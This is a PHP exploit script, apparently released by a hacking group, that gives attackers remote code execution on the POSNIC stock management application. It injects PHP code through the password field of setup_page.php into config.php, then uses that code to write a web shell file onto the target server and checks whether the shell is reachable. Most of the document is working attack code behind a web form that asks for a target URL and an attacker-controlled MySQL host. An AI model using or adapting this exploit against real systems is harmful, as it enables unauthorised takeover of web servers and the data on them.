'; echo $head ; echo '
--==[[ POSNIC, PHP stock management script Remote code execution exploiter ]==--
--==[[ With Love from Team Indishell]]==--
####################################################################################################################################
--==[[Greetz to]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,ethicalnoob Indishell,Local root indishell,Irfninja indishell
Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Gujjar PCP,Bikash,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA
cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP, Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
--==[[Interface Desgined By]]==--
GCE College ke DON :D
####################################################################################################################################
'; echo '
--==[[ code for India,Hack for India,Die for India ]]==--
Please Read it before using this code.

target URL: -

Attacker controled Remote MySQL host: -

Attacker controled Remote MySQL account username: -

'; function request($lu,$payload) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $lu); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); curl_setopt ($ch, CURLOPT_POST, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload"); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_exec ($ch); curl_close ($ch); } function shell_check($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_NOBODY, true); $result = curl_exec($curl); $ret = false; if ($result !== false) { $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE); if ($statusCode == 200) { $ret = true; } } curl_close($curl); return $ret; } function access($lu) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $lu); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); curl_close($ch); return $result['EXE']; } if(isset($_POST['launch'])) { $tar=$_POST['tar']; $mhost=trim($_POST['mhost']); $muser=trim($_POST['muser']); $injecturl=$tar.'/setup_page.php'; $exploiturl=$tar.'/config.php'; ///////////////////////////////////// //here, we are injecting config file ///////////////////////////////////// $hex_it="select[]=1&select_box=owned&host=$mhost&username=$muser&password=\";file_put_contents(\$_POST[2],\$_POST[3]);//&dummy=1&submit=INSTALL"; request($injecturl,$hex_it); ///////////////////////////////////////// ///Her we go, let's dump shell on server //////////////////////////////////////// $code=''; $post_request='2=mannu.php&3='.$code; request($exploiturl,$post_request); access($tar.'/mannu.php'); $shell_link=shell_check($tar.'/ica.php'); if($shell_link==True) { echo 'check your shell at This link '; } } ?>